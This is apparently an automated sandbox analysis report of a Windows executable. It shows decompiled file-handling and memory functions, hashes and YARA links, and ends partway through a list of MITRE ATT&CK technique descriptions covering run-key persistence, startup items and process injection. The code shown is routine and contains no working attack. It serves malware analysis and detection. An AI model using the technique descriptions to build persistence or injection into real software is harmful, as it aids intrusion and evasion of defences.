0x0040184c

APIs

??3@YAXPAX@Z.MSVCRT ref: 00401822
??3@YAXPAX@Z.MSVCRT ref: 00401838

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: c2df082127a9761b6ce5f6970f2e0036084853f8a34ec25ad99dff6117598275
Instruction ID: 8b6be3cb60b1c51ed3deb4657a42463bf8da8ea8499def7bab711f0169418926
Opcode Fuzzy Hash: c2df082127a9761b6ce5f6970f2e0036084853f8a34ec25ad99dff6117598275
Instruction Fuzzy Hash: 66E04F36400A11CFCA20AB15D848986B7B4EF0A320305455EE446AB671CF34ED41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 004131A3, Relevance: 2.6, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E004131A3(signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int* _a16) {
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				intOrPtr _t36;
				intOrPtr* _t38;
				void* _t40;
				intOrPtr _t43;
				intOrPtr _t48;
				signed int* _t49;
				intOrPtr _t50;
				struct _CRITICAL_SECTION* _t56;
				signed int _t57;

				_t57 = _a4;
				_t56 =  *((intOrPtr*)(_t57 + 8)) + 0x18;
				EnterCriticalSection(_t56);
				_t33 =  *((intOrPtr*)(_t57 + 8));
				_t43 =  *((intOrPtr*)(_t57 + 0x10));
				_t50 =  *((intOrPtr*)(_t57 + 0x14));
				if(_t43 !=  *((intOrPtr*)(_t33 + 0x10)) || _t50 !=  *((intOrPtr*)(_t33 + 0x14))) {
					_t34 =  *((intOrPtr*)(_t33 + 8));
					_t35 =  *((intOrPtr*)( *_t34 + 0x10))(_t34, _t43, _t50, 0, 0, _t40);
					if(_t35 == 0) {
						_t36 =  *((intOrPtr*)(_t57 + 8));
						 *((intOrPtr*)(_t36 + 0x10)) =  *((intOrPtr*)(_t57 + 0x10));
						 *((intOrPtr*)(_t36 + 0x14)) =  *((intOrPtr*)(_t57 + 0x14));
						goto L5;
					}
					goto L3;
				} else {
					L5:
					_a4 = _a4 & 0x00000000;
					_t38 =  *((intOrPtr*)( *((intOrPtr*)(_t57 + 8)) + 8));
					_t35 =  *((intOrPtr*)( *_t38 + 0xc))(_t38, _a8, _a12,  &_a4);
					 *((intOrPtr*)(_t57 + 0x10)) =  *((intOrPtr*)(_t57 + 0x10)) + _a4;
					_t48 =  *((intOrPtr*)(_t57 + 8));
					asm("adc dword [esi+0x14], 0x0");
					 *((intOrPtr*)(_t48 + 0x10)) =  *((intOrPtr*)(_t57 + 0x10));
					 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t57 + 0x14));
					_t49 = _a16;
					if(_t49 != 0) {
						 *_t49 = _a4;
					}
					L3:
					LeaveCriticalSection(_t56);
					return _t35;
				}
			}

0x004131a7
0x004131ae
0x004131b2
0x004131b8
0x004131bb
0x004131be
0x004131c4
0x004131cb
0x004131d8
0x004131de
0x004131f4
0x004131f7
0x004131fd
0x00000000
0x004131fd
0x00000000
0x00413200
0x00413200
0x00413200
0x00413207
0x00413217
0x0041321d
0x00413220
0x00413226
0x0041322a
0x00413230
0x00413233
0x00413238
0x0041323d
0x0041323d
0x004131e0
0x004131e3
0x004131ee
0x004131ee

APIs

EnterCriticalSection.KERNEL32(?), ref: 004131B2
LeaveCriticalSection.KERNEL32(?), ref: 004131E3

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 896c1087cd7bbb7dc627c9ffcc443e77ad22d141fa8ddf54c665425f9ae04d73
Instruction ID: 36ed18e3bd8fe72e2fa97f1e031ca809fbb4dca878afed2a6a3ff7bb229d127e
Opcode Fuzzy Hash: 896c1087cd7bbb7dc627c9ffcc443e77ad22d141fa8ddf54c665425f9ae04d73
Instruction Fuzzy Hash: 7D213475200700AFCB28CF59D884EA7BBB9FF88311B108A5DE8568B761C731F941CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041507F, Relevance: 1.6, APIs: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0041507F() {
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				intOrPtr* _t50;
				intOrPtr* _t56;
				intOrPtr* _t57;
				void* _t66;
				intOrPtr* _t67;
				void* _t78;
				intOrPtr* _t80;
				void* _t82;
				intOrPtr* _t83;
				void* _t85;
				void* _t87;

				L0041870C();
				 *((intOrPtr*)(_t85 - 0x10)) = _t87 - 0x88;
				 *(_t85 - 4) = 0;
				_t83 =  *((intOrPtr*)(_t85 + 8));
				 *((intOrPtr*)( *_t83 + 0x10))(_t83, _t78, _t82, _t66);
				 *(_t85 - 4) = 1;
				_t67 =  *((intOrPtr*)(_t85 + 0x14));
				if(_t67 != 0) {
					 *((intOrPtr*)( *_t67 + 4))(_t67);
				}
				 *((intOrPtr*)(_t85 + 0x14)) = 0;
				_t91 = _t67;
				if(_t67 != 0) {
					 *((intOrPtr*)( *_t67))(_t67, 0x41a530, _t85 + 0x14);
				}
				 *((intOrPtr*)(_t85 - 0x94)) = 0;
				 *((intOrPtr*)(_t85 - 0x90)) = 0;
				 *((char*)(_t85 - 0x1c)) = 1;
				 *((char*)(_t83 + 0x140)) = 0;
				_push( *((intOrPtr*)(_t85 + 0x10)));
				_t80 = E00415D1D(_t85 - 0x94, _t91,  *((intOrPtr*)(_t85 + 0xc)));
				if(_t80 == 0) {
					 *((char*)(_t83 + 0x140)) = 1;
					_push(_t83 + 0x14c);
					_push(_t83 + 0x149);
					_push(_t83 + 0x148);
					_push( *((intOrPtr*)(_t85 + 0x14)));
					_push(_t83 + 0x10);
					_t47 = E00417676(_t85 - 0x94); // executed
					_t80 = _t47;
					__eflags = _t80;
					if(_t80 != 0) {
						goto L5;
					} else {
						E00408F80(_t83 + 0xc,  *((intOrPtr*)(_t85 + 0xc)));
						_t56 =  *((intOrPtr*)(_t85 - 0x94));
						__eflags = _t56;
						if(_t56 != 0) {
							 *((intOrPtr*)( *_t56 + 8))(_t56);
						}
						_t57 =  *((intOrPtr*)(_t85 + 0x14));
						__eflags = _t57;
						if(_t57 != 0) {
							 *((intOrPtr*)( *_t57 + 8))(_t57);
						}
						__eflags = _t67;
						if(_t67 != 0) {
							 *((intOrPtr*)( *_t67 + 8))(_t67);
						}
						 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
						_t50 = 0;
					}
				} else {
					L5:
					_t48 =  *((intOrPtr*)(_t85 - 0x94));
					if(_t48 != 0) {
						 *((intOrPtr*)( *_t48 + 8))(_t48);
					}
					_t49 =  *((intOrPtr*)(_t85 + 0x14));
					if(_t49 != 0) {
						 *((intOrPtr*)( *_t49 + 8))(_t49);
					}
					if(_t67 != 0) {
						 *((intOrPtr*)( *_t67 + 8))(_t67);
					}
					_t50 = _t80;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t85 - 0xc));
				return _t50;
			}

0x00415084
0x00415092
0x00415097
0x0041509a
0x004150a0
0x004150a3
0x004150a7
0x004150ac
0x004150b1
0x004150b1
0x004150b4
0x004150b7
0x004150b9
0x004150c7
0x004150c7
0x004150c9
0x004150cf
0x004150d5
0x004150d9
0x004150e0
0x004150f1
0x004150f5
0x00415125
0x00415132
0x00415139
0x00415140
0x00415141
0x00415147
0x0041514e
0x00415153
0x00415155
0x00415157
0x00000000
0x00415159
0x0041515f
0x00415164
0x0041516a
0x0041516c
0x00415171
0x00415171
0x00415174
0x00415177
0x00415179
0x0041517e
0x0041517e
0x00415181
0x00415183
0x00415188
0x00415188
0x0041518b
0x0041518f
0x0041518f
0x004150f7
0x004150f7
0x004150f7
0x004150ff
0x00415104
0x00415104
0x00415107
0x0041510c
0x00415111
0x00415111
0x00415116
0x0041511b
0x0041511b
0x0041511e
0x0041511e
0x004151b5
0x004151c0

APIs

_EH_prolog.MSVCRT ref: 00415084

Part of subcall function 00417676: _EH_prolog.MSVCRT ref: 0041767B

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 707587bcf074efb10cd99c3cdd6d8e8e6bbc76e39b2f68c841c1a2e50634351c
Instruction ID: 8e12092890a6328f906d2de5176f9b06935f1189ecd50063bd67632439ec795f
Opcode Fuzzy Hash: 707587bcf074efb10cd99c3cdd6d8e8e6bbc76e39b2f68c841c1a2e50634351c
Instruction Fuzzy Hash: 59416E31600A09EFCB21DFA4C884BDBB7B9AF84304F14449AE44ADB251DB75ED85CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004012DC, Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004012DC(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t13;
				signed int _t14;
				intOrPtr _t25;

				_t13 = _a8;
				if(_t13 == 0) {
					_t25 = _a4;
					if( *(_t25 + 0x24) != 0) {
						E004109E2(_t25 + 0x34);
					}
					_t14 =  *(_t25 + 0x24);
					if(_t14 != 0) {
						 *((intOrPtr*)( *_t14 + 8))(_t14);
						 *(_t25 + 0x24) =  *(_t25 + 0x24) & 0x00000000;
					}
					if( *((intOrPtr*)(_t25 + 0x1c)) != 0) {
						SetFileAttributesW( *(_t25 + 0x28),  *(_t25 + 0x40)); // executed
					}
					return 0;
				}
				 *0x41e6cc = _t13;
				return 0x80004005;
			}

0x004012dc
0x004012e2
0x004012f1
0x004012f9
0x00401305
0x00401305
0x0040130a
0x0040130f
0x00401314
0x00401317
0x00401317
0x0040131f
0x00401327
0x00401327
0x00000000
0x0040132f
0x004012e4
0x00000000

APIs

SetFileAttributesW.KERNELBASE(?,?), ref: 00401327

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f6efe7a2de3a1551a668d9b83c1a5652a6bd16a046cf843c21af6da9b3618507
Instruction ID: 881b7b8f5db03b8feefa57169125feaa5d13d9d2d240e5a87515409aa0703d03
Opcode Fuzzy Hash: f6efe7a2de3a1551a668d9b83c1a5652a6bd16a046cf843c21af6da9b3618507
Instruction Fuzzy Hash: F7F0F4712046019BE7259B66C844B97B7F4BB48341F44492EE88AA7AA0C738E885CF19

Uniqueness

Uniqueness Score: -1.00%

Function 004108B2, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004108B2(signed int* __ecx, void* __eflags, WCHAR* _a4, long _a8, long _a12, long _a16, long _a20) {
				void* _t8;
				signed int _t9;
				signed int* _t13;

				_t13 = __ecx;
				_t8 = E004107EB(__ecx);
				if(_t8 != 0) {
					_t9 = CreateFileW(_a4, _a8, _a12, 0, _a16, _a20, 0); // executed
					 *_t13 = _t9;
					return _t9 & 0xffffff00 | _t9 != 0xffffffff;
				}
				return _t8;
			}

0x004108b6
0x004108b8
0x004108bf
0x004108d4
0x004108df
0x00000000
0x004108e1
0x004108e6

APIs

Part of subcall function 004107EB: FindCloseChangeNotification.KERNELBASE(00000000,00000014,004108BD,00000000,?,00410903,00000000,80000000,00000000,00000000,00000000,00410926,00000000,00000000,00000003,00000080), ref: 004107F6

CreateFileW.KERNELBASE(00000000,00408FD5,00000000,00000000,00000000,00410934,00000000,00000000,?,00410903,00000000,80000000,00000000,00000000,00000000,00410926), ref: 004108D4

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeCloseCreateFileFindNotification
String ID:
API String ID: 727422849-0
Opcode ID: 1ae4488efc82a002939744a7417d0141d60ab330cd913bb8742faeef761974c9
Instruction ID: 3863244683ab47b388a9948793b0f279b2718018306f7563a55474ed4187bb04
Opcode Fuzzy Hash: 1ae4488efc82a002939744a7417d0141d60ab330cd913bb8742faeef761974c9
Instruction Fuzzy Hash: BBE08632101219BBCF115FA4DC02FDE3F56AF09370F104126FA10561E0C772D4B0AB94

Uniqueness

Uniqueness Score: -1.00%

Function 004109F2, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004109F2(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				long _t12;
				signed int _t14;
				void** _t16;

				_t16 = __ecx;
				_push(__ecx);
				_t12 =  *0x41e5f0; // 0x400000
				if(_a8 > _t12) {
					_a8 = _t12;
				}
				_v8 = _v8 & 0x00000000;
				_t14 = WriteFile( *_t16, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t14 & 0xffffff00 | _t14 != 0x00000000;
			}

0x004109f2
0x004109f5
0x004109f6
0x004109fe
0x00410a00
0x00410a00
0x00410a03
0x00410a15
0x00410a23
0x00410a29

APIs

WriteFile.KERNELBASE(00000008,00000000,00000001,00000000,00000000,00000008,?,00410A4E,00000000,00000001,00000000,00000000,00000000,?,00411A4A,00000001), ref: 00410A15

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 061fc7c953081243d1d5e3869cadf79958c776b7de07a968656336781de9f4f3
Instruction ID: 5a079ce33731305e1e6c83faf797c000c46fcbb7b5423ea988ad1c8f56141e2d
Opcode Fuzzy Hash: 061fc7c953081243d1d5e3869cadf79958c776b7de07a968656336781de9f4f3
Instruction Fuzzy Hash: 8CE0C275640209FBCB00CF95C801BDE7BBAAB08354F10C069F9149A260D3799A50DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00410937, Relevance: 1.5, APIs: 1, Instructions: 18
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00410937(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				signed int _t11;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t11 = ReadFile( *__ecx, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t11 & 0xffffff00 | _t11 != 0x00000000;
			}

0x0041093a
0x0041093b
0x0041094d
0x0041095b
0x00410961

APIs

ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0041094D

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 39bbe8b1e9019e7b2d5fad33dac547c7575ae00130540e2fd0b68d00fb51dad4
Instruction ID: 592777a0cbf9ed61c554e453f95aac0b5ff3b8d945bf09df7fedf92081e1879d
Opcode Fuzzy Hash: 39bbe8b1e9019e7b2d5fad33dac547c7575ae00130540e2fd0b68d00fb51dad4
Instruction Fuzzy Hash: 14E0EC75201208FFDB01CF90CD01FDE7BBEEB49758F208058E90496160C7769A20EB55

Uniqueness

Uniqueness Score: -1.00%

Function 004109C5, Relevance: 1.5, APIs: 1, Instructions: 9
timeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E004109C5(void** __ecx, FILETIME* _a4, FILETIME* _a8, FILETIME* _a12) {
				signed int _t4;

				_t4 = SetFileTime( *__ecx, _a4, _a8, _a12); // executed
				asm("sbb eax, eax");
				return  ~( ~_t4);
			}

0x004109d3
0x004109db
0x004109df

APIs

SetFileTime.KERNELBASE(?,?,?,?,004109EF,00000000,00000000,?,0040130A,?), ref: 004109D3

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID: FileTime
String ID:
API String ID: 1425588814-0
Opcode ID: 5e2c3f4fd95572551ce7389ed7a8d0418e4bf28c6d4fd737443a5967939eb4fb
Instruction ID: 14e9d413570242a207ede0755a0e187765c1d7efe63821fc46ad5d1f7ad43643
Opcode Fuzzy Hash: 5e2c3f4fd95572551ce7389ed7a8d0418e4bf28c6d4fd737443a5967939eb4fb
Instruction Fuzzy Hash: 23C04C36159105FFCF020FB0CC04C1ABFA2BB99311F10C918B159C4070C7328038EB02

Uniqueness

Uniqueness Score: -1.00%

Function 00411843, Relevance: 1.3, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00411843(void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr* _a16) {
				void* _t12;
				signed int _t13;
				signed int _t15;
				intOrPtr* _t20;
				intOrPtr _t24;

				_t24 = _a4;
				_push( &_a12);
				_t12 = E00410964(_t24 + 0x14, _a8, _a12); // executed
				_t20 = _a16;
				if(_t20 != 0) {
					 *_t20 = _a12;
				}
				if(_t12 != 0) {
					return 0;
				}
				_t13 = GetLastError();
				__eflags =  *(_t24 + 0x1c);
				if( *(_t24 + 0x1c) != 0) {
					return  *((intOrPtr*)( *( *(_t24 + 0x1c))))( *((intOrPtr*)(_t24 + 0x20)), _t13);
				}
				__eflags = _t13;
				if(__eflags == 0) {
					return 0x80004005;
				}
				if(__eflags > 0) {
					_t15 = _t13 & 0x0000ffff | 0x80070000;
					__eflags = _t15;
					return _t15;
				}
				return _t13;
			}

0x00411847
0x0041184d
0x00411857
0x0041185c
0x00411861
0x00411866
0x00411866
0x0041186a
0x00000000
0x0041186c
0x00411870
0x00411876
0x0041187a
0x00000000
0x00411885
0x00411889
0x0041188b
0x00000000
0x0041188d
0x00411894
0x0041189b
0x0041189b
0x00000000
0x0041189b
0x004118a2

APIs

GetLastError.KERNEL32(?,?,?), ref: 00411870

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 270599f0ca182191eb47fc7821e71d82412a6a4cb845b8a7e9ef14c5748f9ed8
Instruction ID: e8601535ed8eb91c148af81c07e811f9bc88811ce6075f4bdfdbad24ca373894
Opcode Fuzzy Hash: 270599f0ca182191eb47fc7821e71d82412a6a4cb845b8a7e9ef14c5748f9ed8
Instruction Fuzzy Hash: 36F0817150020ADFDB24EF55D800AF73769EF01354F10C92BEA4A86270D739EC96DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00403AF9, Relevance: 1.3, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00403AF9(void* __eax, void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t3;
				void* _t9;
				void* _t10;

				_t9 = __edx;
				_push(0x18);
				_t10 = __ecx; // executed
				L00418686(); // executed
				_t11 = __eax;
				if(__eax == 0) {
					_t3 = 0;
					__eflags = 0;
				} else {
					_t3 = E00402F6E(__eax, _t11, _a4);
				}
				return E0041779E(_t10, _t9, _t3);
			}

0x00403af9
0x00403afa
0x00403afc
0x00403afe
0x00403b04
0x00403b06
0x00403b15
0x00403b15
0x00403b08
0x00403b0e
0x00403b0e
0x00403b20

APIs

??2@YAPAXI@Z.MSVCRT ref: 00403AFE

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 6f57add3a2ff2ef693ab1f5b898bf3e0d4b441e17f31d14466709ad5b3002f3e
Instruction ID: 4142c085fb0be7558852590d176066c7d65798c523efe484b0759b483a02352f
Opcode Fuzzy Hash: 6f57add3a2ff2ef693ab1f5b898bf3e0d4b441e17f31d14466709ad5b3002f3e
Instruction Fuzzy Hash: 01D0A93230431212CAA42132080AAAF19A84B86368B40083FB404F72C2EC7CCE81529D

Uniqueness

Uniqueness Score: -1.00%

Function 00418390, Relevance: 1.3, APIs: 1, Instructions: 10
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418390(long _a4) {
				long _t2;
				void* _t3;

				_t2 = _a4;
				if(_t2 != 0) {
					_t3 = VirtualAlloc(0, _t2, 0x1000, 4); // executed
					return _t3;
				} else {
					return _t2;
				}
			}

0x00418390
0x00418396
0x004183a3
0x004183a9
0x00418398
0x00418398
0x00418398

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00411BCD,?,00000000), ref: 004183A3

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d0325cc595e33c00b7a557168a01a3fe958b6907b7832f2ced285ab07d6559a5
Instruction ID: d44aee69685a0545db184606ed17efe78ff1937bb8df66edcbf846d4aa5a9a64
Opcode Fuzzy Hash: d0325cc595e33c00b7a557168a01a3fe958b6907b7832f2ced285ab07d6559a5
Instruction Fuzzy Hash: DFC092B07843057AFE308E548D06FA636A8AB84F9AF948058BB48E90C0D6A49840951A

Uniqueness

Uniqueness Score: -1.00%

Function 004183D0, Relevance: 1.3, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004183D0(int _a8) {
				int _t2;
				void* _t3;

				_t2 = _a8;
				if(_t2 != 0) {
					_t3 = malloc(_t2); // executed
					return _t3;
				} else {
					return _t2;
				}
			}

0x004183d0
0x004183d6
0x004183da
0x004183e3
0x004183d8
0x004183d8
0x004183d8

APIs

malloc.MSVCRT ref: 004183DA

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: d9f76b9d5ea2be50188825fe82983bdd56f3947511eb3970d73970e4e8b3f193
Instruction ID: f2fc7f63da2ab42d1730b1ba1828e8c22167a5967c7ded67ac7c86dbb0a756bb
Opcode Fuzzy Hash: d9f76b9d5ea2be50188825fe82983bdd56f3947511eb3970d73970e4e8b3f193
Instruction Fuzzy Hash: E2B0127860120157DE004BA8EC4C99737D97F80A45BC8C4F8FC06C2320E73ED468950F

Uniqueness

Uniqueness Score: -1.00%

Function 004183F4, Relevance: 1.3, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004183F4(void* __eax) {
				void* _t1;

				_t1 = __eax;
				free(__eax); // executed
				return _t1;
			}

0x004183f4
0x004183f5
0x004183fc

APIs

free.MSVCRT ref: 004183F5

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: bc19279d06e4c7d1fe2a06bbf3f4d939c20dbd8999716a67f3d05e8ccd466c02
Instruction ID: 9d80d26e17f6b68ae017a2aa9f146e3fda8bacf8fdc0c6f88f9a224c71699ffe
Opcode Fuzzy Hash: bc19279d06e4c7d1fe2a06bbf3f4d939c20dbd8999716a67f3d05e8ccd466c02
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
